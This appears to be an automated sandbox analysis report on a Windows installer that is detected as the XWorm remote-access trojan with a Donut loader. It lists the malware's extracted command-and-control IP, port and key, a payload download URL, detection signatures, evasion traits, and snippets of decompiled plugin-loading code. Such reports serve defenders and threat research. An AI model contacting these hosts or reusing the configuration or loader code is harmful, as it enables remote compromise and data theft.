Edit tour

Windows Analysis Report
998_popxinv_Installer.exe

Overview

General Information

Sample name:	998_popxinv_Installer.exe
Analysis ID:	1466320
MD5:	a8dc1e962f313cd278b0e648a6674d91
SHA1:	dd55bccfc5c30aa9a608b6c6fd10dd392cec82ad
SHA256:	1bc92d0988234ee9f52b96fd7ecd8d0b4159d69480581e5f46b2f29ab0f77684
Tags:	exe
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (may stop execution after checking a module file name)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

998_popxinv_Installer.exe (PID: 1564 cmdline: "C:\Users\user\Desktop\998_popxinv_Installer.exe" MD5: A8DC1E962F313CD278B0E648A6674D91)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["134.122.174.169"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x11dcc:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\Public\Downloads\ind.jpg	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\998[1].ccp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.3870470602.0000000003AD0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.3872605515.0000000005F90000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.3872605515.0000000005F90000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6af2:$cnc4: POST / HTTP/1.1
Process Memory Space: 998_popxinv_Installer.exe PID: 1564	JoeSecurity_XWorm	Yara detected XWorm	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6af2:$cnc4: POST / HTTP/1.1
0.2.998_popxinv_Installer.exe.5f90000.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.998_popxinv_Installer.exe.5f90000.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x4e80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x4f1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5032:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4cf2:$cnc4: POST / HTTP/1.1

Snort Signatures

ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound - Source IP: 192.168.2.8 - Destination IP: 134.122.174.169

Timestamp:	07/02/24-19:31:18.778371
SID:	2853193
Source Port:	49749
Destination Port:	7000
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound - Source IP: 192.168.2.8 - Destination IP: 134.122.174.169

Timestamp:	07/02/24-19:29:42.015000
SID:	2855924
Source Port:	49729
Destination Port:	7000
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.3871104262.0000000003D51000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["134.122.174.169"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Multi AV Scanner detection for submitted file

Source: 998_popxinv_Installer.exe

ReversingLabs: Detection: 21%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 998_popxinv_Installer.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack	String decryptor: 134.122.174.169
Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack	String decryptor: 7000
Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack	String decryptor: <123456789>
Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack	String decryptor: <Xwormmm>
Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack	String decryptor: XWorm V5.6
Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack	String decryptor: USB.exe

Source: 998_popxinv_Installer.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 998_popxinv_Installer.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.8:49729 -> 134.122.174.169:7000
Source: Traffic	Snort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.8:49749 -> 134.122.174.169:7000

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 134.122.174.169

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 881
Source: unknown	Network traffic detected: HTTP traffic on port 881 -> 49704

Source: global traffic	TCP traffic: 192.168.2.8:49704 -> 91.208.240.157:881
Source: global traffic	TCP traffic: 192.168.2.8:49705 -> 134.122.174.169:7000

Source: Joe Sandbox View

IP Address: 91.208.240.157 91.208.240.157

Source: Joe Sandbox View

ASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG

Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169
Source: unknown	TCP traffic detected without corresponding DNS query: 134.122.174.169

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe

Code function: 0_2_00A125C5 __EH_prolog,InternetReadFile,

0_2_00A125C5

Source: global traffic

HTTP traffic detected: GET /998.ccp HTTP/1.1User-Agent: DownloadHost: guanlix.cn:881Cache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: guanlix.cn

Source: 998_popxinv_Installer.exe	String found in binary or memory: http://guanlix.cn:881/998.ccp
Source: 998_popxinv_Installer.exe, 00000000.00000002.3869480227.00000000013DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://guanlix.cn:881/998.ccpS
Source: 998_popxinv_Installer.exe, 00000000.00000002.3871104262.0000000003D51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.998_popxinv_Installer.exe.5f90000.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.3870470602.0000000003AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.3872605515.0000000005F90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\Public\Downloads\ind.jpg, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\998[1].ccp, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: 0_2_00A2007E	0_2_00A2007E
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: 0_2_00A25A2A	0_2_00A25A2A
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: 0_2_00A2738F	0_2_00A2738F
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: 0_2_00A1FBE9	0_2_00A1FBE9
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: 0_2_00A20BD6	0_2_00A20BD6
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: 0_2_00A254D9	0_2_00A254D9
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: 0_2_00A2041C	0_2_00A2041C
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: 0_2_00A26657	0_2_00A26657
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: 0_2_00A207EE	0_2_00A207EE
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: 0_2_00A25F7B	0_2_00A25F7B
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: 0_2_00A27F4F	0_2_00A27F4F
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: 0_2_05FA55D8	0_2_05FA55D8
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: 0_2_05FA4D08	0_2_05FA4D08
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: 0_2_05FA07A0	0_2_05FA07A0
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: 0_2_05FA49C0	0_2_05FA49C0

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe

Code function: String function: 00A1A9B0 appears 45 times

Source: 998_popxinv_Installer.exe, 00000000.00000000.1407204265.0000000000A33000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamewindos.exe. vs 998_popxinv_Installer.exe
Source: 998_popxinv_Installer.exe, 00000000.00000002.3872605515.0000000005F90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient.exe4 vs 998_popxinv_Installer.exe
Source: 998_popxinv_Installer.exe	Binary or memory string: OriginalFilenamewindos.exe. vs 998_popxinv_Installer.exe

Source: 998_popxinv_Installer.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.998_popxinv_Installer.exe.5f90000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.3870470602.0000000003AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.3872605515.0000000005F90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\Public\Downloads\ind.jpg, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\998[1].ccp, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/2@1/2

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\998[1].ccp

Jump to behavior

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Mutant created: \Sessions\1\BaseNamedObjects\8M3hFSmRgZDf09wt

Source: 998_popxinv_Installer.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 998_popxinv_Installer.exe

ReversingLabs: Detection: 21%

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Section loaded: winmm.dll	Jump to behavior

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: 998_popxinv_Installer.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: 998_popxinv_Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 998_popxinv_Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 998_popxinv_Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 998_popxinv_Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 998_popxinv_Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack, Messages.cs	.Net Code: Memory

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe

Code function: 0_2_00A240E4 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00A240E4

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: 0_2_00A1A9F5 push ecx; ret	0_2_00A1AA08
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: 0_2_00A14948 push eax; ret	0_2_00A14966
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: 0_2_00A16649 push ecx; ret	0_2_00A1665C
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: 0_2_05FA7550 push es; ret	0_2_05FA7560
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: 0_2_05FA6B88 pushad ; ret	0_2_05FA6B89

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 881
Source: unknown	Network traffic detected: HTTP traffic on port 881 -> 49704

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
